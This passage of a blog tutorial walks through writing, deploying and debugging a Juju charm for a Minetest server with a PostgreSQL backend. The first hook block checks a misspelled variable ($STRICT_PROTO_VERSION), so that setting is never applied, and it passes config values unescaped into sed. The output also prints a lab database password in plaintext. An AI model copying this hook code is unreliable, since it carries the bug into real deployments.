STRICT_PROTOCOL_VERSION_CHECKING=`config-get strict-protocol-version-checking`
if [ ! -z "$STRICT_PROTO_VERSION" ]; then
    sed -i -e "s/^strict_protocol_version_checking \= .*/strict_protocol_version_checking \= ${STRICT_PROTOCOL_VERSION_CHECKING}/" $CONFIG_FILE
fi

CREATIVE_MODE=`config-get creative-mode`
if [ ! -z "$CREATIVE_MODE" ]; then
    sed -i -e "s/^creative_mode \= .*/creative_mode \= ${CREATIVE_MODE}/" $CONFIG_FILE
fi

ENABLE_DAMAGE=`config-get enable-damage`
if [ ! -z "$ENABLE_DAMAGE" ]; then
    sed -i -e "s/^enable_damage \= .*/enable_damage \= ${ENABLE_DAMAGE}/" $CONFIG_FILE
fi

DEFAULT_PASSWORD=`config-get default-password`
if [ ! -z "$DEFAULT_PASSWORD" ]; then
    sed -i -e "s/^default_password \= .*/default_password \= ${DEFAULT_PASSWORD}/" $CONFIG_FILE
fi

DEFAULT_PRIVS=`config-get default-privs`
if [ ! -z "$DEFAULT_PRIVS" ]; then
    sed -i -e "s/^default_privs \= .*/default_privs \= ${DEFAULT_PRIVS}/" $CONFIG_FILE
fi

ENABLE_PVP=`config-get enable-pvp`
if [ ! -z "$ENABLE_PVP" ]; then
    sed -i -e "s/^enable_pvp \= .*/enable_pvp \= ${ENABLE_PVP}/" $CONFIG_FILE
fi

The more interesting part of the hook is right at the top with the open-port hook tool. Since we can change what port the server binds to, we need to be able to tell Juju what port to expose to the user. open-port does exactly this.

Mark All Hooks as Executable

All hook files need to be executable, so we need to ensure they are marked as such. Do a quick chmod over the contents of the hooks directory.

$ chmod +x ~/charms/minetest-server/hooks/*

Deploying the Charm

Now that we have our Charm written, we need to test it to ensure it works, and debug it if it doesn’t. To do that, we are going to deploy it under debug mode and keep track of its progress.

Make a Juju Controller

Since this is Juju, we need to have a controller running if we don’t already have one configured. We are going to use LXD as our backing cloud to keep this easy.

I’m going to make my controller use eoan as the operating system, so I will set --bootstrap-series=eoan when creating the controller.

$ juju bootstrap --bootstrap-series=eoan localhost lxd-controller
Creating Juju controller "lxd-controller" on localhost/localhost
Looking for packaged Juju agent version 2.7.0 for amd64
To configure your system to better support LXD containers, please see: https://github.com/lxc/lxd/blob/master/doc/production-setup.md
Launching controller instance(s) on localhost/localhost...
 - juju-9fba67-0 (arch=amd64)          
Installing Juju agent on bootstrap instance
Fetching Juju GUI 2.15.0
Waiting for address
Attempting to connect to 10.72.102.88:22
Connected to 10.72.102.88
Running machine configuration script...
Host key fingerprint is SHA256:WWJ5Rrtbd0pNIPgNX1DYpuBq1PcnipRpiqIAVNKYMko
+---[RSA 2048]----+
| .+.      ... o=.|
|oEo.     o..o...+|
|+o      + =+ = +.|
|o      . *..+ =o |
|.       S..+..o.o|
|.         Bo o.oo|
|.      . =.. ....|
| .  . . . . .    |
|  .. .           |
+----[SHA256]-----+
Bootstrap agent now started
Contacting Juju controller at 10.72.102.88 to verify accessibility...

Bootstrap complete, controller "lxd-controller" now is available
Controller machines are in the "controller" model
Initial model "default" added

After that, we can check the status of juju controllers to make sure our controller has been registered correctly:

Since we now have an active controller, we can also query juju status which should be empty:

Deploy the PostgreSQL Charm

Our Minetest Charm depends on the PostgreSQL charm, so we will go ahead and deploy that first.

Searching the Charm Store brings us to the PostgreSQL Charm, which we can deploy with:

$ juju deploy postgresql

This gives us a single standalone PostgreSQL instance. The Charm supports clustering and such, but we won’t go to such efforts for our little Minetest world.

From there Juju will go and create a new bionic container and install PostgreSQL.

We can check juju status to keep tabs on progress.

Deploy the Minetest Charm

Here comes the moment of truth. Let’s deploy our Minetest Charm!

Firstly, in case this goes horribly, we will watch the debug logs. Open up a terminal tab and run:

$ juju debug-log

This lets us follow along on a very low level what Juju is doing.

We can deploy our local charm by simply referencing the directory it lives in:

$ juju deploy ~/charms/minetest-server --series eoan
Deploying charm "local:eoan/minetest-server-0".

Now we can check Juju status to see how it went:

As you can see, my deploy went badly and got stuck on the install hook. Seems I forgot to set apt to automatically answer yes to commands. Ah well.

If this happens to you, you can remove the machine with:

$ juju remove-machine 1 --force
removing machine 1
- will remove unit minetest-server/0
$ juju remove-application minetest-server
removing application minetest-server

Just make sure you get the correct machine number from juju status.

Fix your mistakes, and then try and try again:

$ juju deploy ~/charms/minetest-server --series eoan
Deploying charm "local:eoan/minetest-server-0".

Eventually after enough revisions of fixing things, our Charm will be deployed and will be waiting for a database connection:

Time to get Minetest connected to PostgreSQL.

Add Relations

As we learned in the previous blog post, relations are connections between two Charms, where a Charm provides a service to another. In this case, we want the PostgreSQL Charm to offer database services to Minetest.

We can add a relation with:

$ juju add-relation postgresql:db minetest-server:db

Juju will automatically go and call the db-relation-changed hook in the minetest-server Charm, and also call the same in postgresql Charm. The PostgreSQL Charm will go and create a new user, database and set up passwords and permissions properly, so everything is ready for us to relation-get the information from our db-relation-changed hook.

We probably want to verify that everything went well, since this was a particular pain point in writing my charm.

We can issue juju ssh to get into the minetest-server unit, and from there look to see if there are any database credentials in world.mt:

$ juju ssh 3
ubuntu@juju-adfa12-2:~$ cd /home/minetest/.minetest/worlds/world/
ubuntu@juju-adfa12-2:/home/minetest/.minetest/worlds/world$ ll
total 21444
drwxr-xr-x 2 minetest minetest     4096 Dec  1 21:46 ./
drwxr-xr-x 3 minetest minetest     4096 Dec  1 21:46 ../
-rw-r--r-- 1 minetest minetest     1054 Dec  1 22:04 world.mt
ubuntu@juju-adfa12-2:/home/minetest/.minetest/worlds/world$ cat world.mt
port = 30000
server_name = Minetest server
server_description = Juju deployed Minetest server
motd = Welcome!
strict_protocol_version_checking = false
creative_mode = false
enable_damage = false
default_password =
default_privs = build,shout
enable_pvp = true
gameid = minetest
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host=10.72.102.206 port=5432 user=juju_minetest-server password=6yrPy37rM3GbPdzyZJGX29W5sX6jZdxJgYkJGF dbname=minetest-server
pgsql_player_connection = host=10.72.102.206 port=5432 user=juju_minetest-server password=6yrPy37rM3GbPdzyZJGX29W5sX6jZdxJgYkJGF dbname=minetest-server

Wow! Everything actually worked! Man, am I happy to see those credentials there.

Checking juju status once more should yield everything is okay:

Time for the moment of truth. Can we connect to our server?

Start Minetest Client and Connect to Server

There’s one more thing we have to do before enjoying a game of Minetest, and that is opening the port of the game up to the world.

We can do this with juju expose.

$ juju expose minetest-server

Go ahead and open up Minetest on your computer and click the “Join Game” tab. From juju status we see our Minetest server is running on 10.72.102.109 on the default port of 30000.

Hit connect and…

We are in the game, on a Juju deployed server!

Changing and Reloading Configuration

Now that we can play the game, if we want to change any of the configuration settings we wrote into the charm, we can use the Juju GUI, or the command line.

We can issue juju config to get a list of configuration options:

We can change it by issuing juju config followed by a list of options:

$ juju config minetest-server creative-mode=true

The start hook is automatically run after config-changed, which means once config-changed has finished modifying the world.mt configuration file, the server will automatically be restarted and the changed applied.

Debugging the Charm

There will be times when you are writing your Charm and things just don’t work as intended. Here are some ways that you can get more information on what is happening.

Getting Juju Logs

As mentioned before, if you run juju debug-log in another tab, you can keep track of events, like specific hooks firing, and you can see a lot of detailed error messages. This is the first place to look.

Manually Running Hooks

Sometimes if your hooks aren’t working correctly, and you would like to debug further, you can switch to a internal tmux session in Juju by running juju debug-hooks <application>/<unit id>.

For example:

$ juju debug-hooks minetest-server/2

This will allow you to run hook tools, such as config-get, config-set, relation-list, relation-get and relation-set. For the relation tools, you need to have a relation added first, and it usually works best when you remove the relation, enter hook debugging, then re-add the relation while you are in the tmux session.

From here you can run your hooks, and since they are suppose to be idempotent, you can keep running them, and examining your systems, to see if your live changes to the hooks work. The tmux session has vi and nano, so feel free to edit your hooks on the fly.

The tmux session is already in the directory of your Charm, and you are root, so you can modify anything.

root@juju-adfa12-3:/var/lib/juju/agents/unit-minetest-server-2/charm# ls
README  config.yaml  copyright  hooks  icon.svg  metadata.yaml  revision

Hook debugging really helped me to get this Charm working.

Cleaning Up

Once we have finished, We can shut down our services and remove them by issuing:

$ juju remove-application minetest-server
removing application minetest-server
$ juju remove-application postgresql
removing application postgresql

To clean up our controller, we can issue juju destory-controller. Note that will remove all deployments to all models, so you should probably be sure you really want to do this before you run it.

juju destroy-controller lxd-controller --destroy-all-models
WARNING! This command will destroy the "lxd-controller" controller.
This includes all machines, applications, data and other resources.

Continue? (y/N):y
Destroying controller
Waiting for hosted model resources to be reclaimed
Waiting on 1 model
All hosted models reclaimed, cleaning up controller machines

That’s it. All machines have been destroyed and we are back to a clean slate.

Conclusion

There we have it. We wrote our first Charm, and successfully managed to Juju deploy a Minetest server backed by a PostgreSQL database.

Along the way we learned what each part of the original method for writing Charms does, how to operate hook tools and debug our Charm.

Maybe now I can actually sit down and play the game instead of spending all this time writing the Charm, haha.

Hopefully you enjoyed the read, and as always feel free to contact me.

Matthew Ruffell